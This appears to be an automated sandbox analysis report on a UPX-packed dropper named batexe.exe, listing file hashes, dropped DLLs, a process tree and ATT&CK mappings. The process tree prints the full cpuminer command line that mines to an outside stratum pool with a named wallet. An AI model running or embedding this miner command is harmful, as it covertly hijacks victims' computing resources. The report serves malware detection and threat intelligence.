73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
302s
platform
windows10-1703_x64
resource
win10-20231220-ja
resource tags

arch:x64arch:x86image:win10-20231220-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
13/02/2024, 07:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2784	b2e.exe
1436	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1436	cpuminer-sse2.exe
1436	cpuminer-sse2.exe
1436	cpuminer-sse2.exe
1436	cpuminer-sse2.exe
1436	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4496-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4496 wrote to memory of 2784	4496	batexe.exe	65
PID 4496 wrote to memory of 2784	4496	batexe.exe	65
PID 4496 wrote to memory of 2784	4496	batexe.exe	65
PID 2784 wrote to memory of 4852	2784	b2e.exe	76
PID 2784 wrote to memory of 4852	2784	b2e.exe	76
PID 2784 wrote to memory of 4852	2784	b2e.exe	76
PID 4852 wrote to memory of 1436	4852	cmd.exe	78
PID 4852 wrote to memory of 1436	4852	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4496
- C:\Users\Admin\AppData\Local\Temp\9124.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9124.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9124.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\92CA.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4852
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9124.tmp\b2e.exe

Filesize
500KB

MD5
844bf6c682039f3688cdc6f85e8d4f39

SHA1
fc3878bb8a0c86f4a894e96f97b5f06d299a9880

SHA256
913e525fae4342eeb60df9c90872d8cc79318f6a6b26a8085063316ad040641d

SHA512
c0459efd529eca526fd68588708b96f16a33d8ed3a705a44033c641657d616c4123c2bc9933e96cf10ac59b8369fd5a1081b3e61caa3a8e9aa1feff64615814f

Download Submit
C:\Users\Admin\AppData\Local\Temp\9124.tmp\b2e.exe

Filesize
613KB

MD5
4329c7747c465386e3636d677a6d68ab

SHA1
7814d5d9ffb0ac184fb60e0b86c5806ce6018fcb

SHA256
74783f8fb44d6a0f0f4143006648a477fa8956658d66002d90183095136fc19a

SHA512
16b92aed1d89f382ae143eae08ffb98da38dd5a40b6947f85c6c78ff47344424887c227c5ce68209d07e08dc95cde8f8e08f3e9bf467159ef4bcf4ca209e4e8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\92CA.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
329KB

MD5
f432ce90f8d83c1c350796b8983c2023

SHA1
a8cb107b022364cd1aeff0ac5760a3cac9203a7a

SHA256
856cb438d17169ea184e48737d8e42da72a399ae70107336f04805223746127b

SHA512
9df273253c46ef7a11800898c71ec566de23916182a74a3ab90b330634696affdbfcd02128bc61536ca6c678e32836acea881b90b2f9b38dc4f97681bb74c388

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
275KB

MD5
c355433fc9484b9ec15660b54b737974

SHA1
b68c2f4742f035693a4e317b6ffe7d4228b9b18e

SHA256
b5ef8c3a8e814da043ec40ad198204aa18dd08490c90e8e5973c3f0e5618ef21

SHA512
df56c2fe3779a99d431f59971105b590dfcd8ab8945bb3e7300d1998ff2db65a9aa56007e7897d4c51ae7175c4db71137a79f6316ffe48cb959b7181a63700fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
715KB

MD5
f808715533ca95741533e90cd4988917

SHA1
7e1bcc639b0d4daed5d9dcbdcb7b488fe3509cd0

SHA256
23398b4c1479db7683bf78efd65805b413ee1ac4fb5bda3134cf4c58f7a6f1f8

SHA512
3bb2ed306033b48ece73f9126d7671bafc28b82ed13738ed82cb675ecd07bdeeaa6ee700c295052c783dbfe99c5db1b15763727ff338ee26a3963a61d46cfbec

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
244KB

MD5
0b3770819f83068ad2e799636f4cb72b

SHA1
ba110d897503fad68f886a7e624efcd0306e2293

SHA256
cb7263b8676101b4f9b10a3eae1fbf8fde79e4479ad30affc27c03d554625e03

SHA512
2714a639af26a929c6ea21531867010a8c0068f228b0a6e3a431aaf1cbe7ba86fb32f807a5ee0e092b13a9454a2dbb0e9cbdbdefe582b8ba72b2f80e8da9e5a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
344KB

MD5
8812f276f9be10ed5cc94258c7d74bd7

SHA1
847d6604c0181f260b3486e158bb8d50588de744

SHA256
15934e12cab12558b593c88b02fa4aa8133a0f19a01d5c550ed4755c556b38bc

SHA512
56bccb2d7491801bc879f0650e022bbd498800c23e6edeec1821827998cb134a140bdc678f371e08ebbada87b38bf83e87075e61e19e0c16e0ba2cc8bfad7b4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
186KB

MD5
ac988fba00bc1e436dfdf305f32d695e

SHA1
1825cdf667a1947fb91d37980caab4156e1225d3

SHA256
788d0479d6f3ee1cd07b1ae393fa2bda927eee87029ae915735b783836bfe025

SHA512
93fc88ab47f7c7f74f55615f33293a444171c0fbb49425a8d7bea29bdf000d0e0abb6e271bcf5afae1cb18d06713f798325913cc81444694cf22bbfed3a25772

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
434KB

MD5
36eb88fe2fa8a8b31d4d12f5dbf81d6b

SHA1
15e75083918415b460ae8c3b96a871caf70227fb

SHA256
5bae7204ef27c8e33fcf46d2e9b79527ba2fd53966b96c03a00ca32365eca29e

SHA512
7b7b286d437db5f46c5ccee889264a0ee5cac685ecb8ab7223619b57e328a7230900d215c59081674a14dda11ef79098bd076a3c2c560be34398e19e30ad3cf3

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
274KB

MD5
66d62e93687a2c3e1520737bb44a02d5

SHA1
bc948813e330eb7ccae7d4b4be6d3d0a45fceeed

SHA256
b449637ffe7dc1dd8fc17b09e0cea586531f38c90d7f7aba696776e4991f63f1

SHA512
074a38de790dd9728cdd086f942ba0d874bfe021227a0d24b3a26fd358cc4cb1fdce6f7d2331c41aef237f353e9bbfdd5fdc0f21c600152c29ea363a41782ced

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
294KB

MD5
79a255a6af276a24badf9c44df8ec05a

SHA1
51f394f79f8731d4f8cfa2405bbe0e2b61106d61

SHA256
5e0a78a5fd1379ac89f258dd0b6d7168f57c17713593d78bf4fc3b6c93c0c66e

SHA512
f241ba2d00a0250a6460be7fc9573a4cdd7747a4c5c9ebaff37f16e024fcdc5b0a0670543398a8608d7b96027318214c88f3f24c31f3a7b97a01519bd3019617

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
303KB

MD5
a17f995f0b4ae70eb3ee875fccdd97b4

SHA1
7be0caba8835fb1fcbf178bc0ae01a5ea74af5a5

SHA256
979b3b41e2f513cc456b3e0b9be77fc7944dd17ec983dc1ce9fba4ac7948f0af

SHA512
e834038c2544004302e400d6285d0cf39ec5a6a2c7ad24004169aeb3e08a3588e1a9fa595f2c1191235a96965021c31c14f9fe2acce769aaaa7888f5316b081e

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
288KB

MD5
f2b83c5a644c870af6500c3662ab748f

SHA1
7babff9c93aba3e6e2a076710071bd4ef4f1b406

SHA256
ee561550804e38eafe17daa4d024d885d3331c59eff9bd047ea66c290c449711

SHA512
7207e245448d263f4b9b7c8f73b18f74867ce6a41cc8a71f76e25960ba65674217a8ae664f9dc92c3a5d80f21421055104a43ed70e4818345716c32b2abb905d

Download Submit
memory/1436-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1436-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1436-43-0x000000006F0E0000-0x000000006F178000-memory.dmp

Filesize
608KB

Download
memory/1436-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1436-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1436-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1436-44-0x0000000001020000-0x00000000028D5000-memory.dmp

Filesize
24.7MB

Download
memory/1436-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1436-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1436-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1436-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1436-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1436-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1436-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2784-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2784-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4496-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download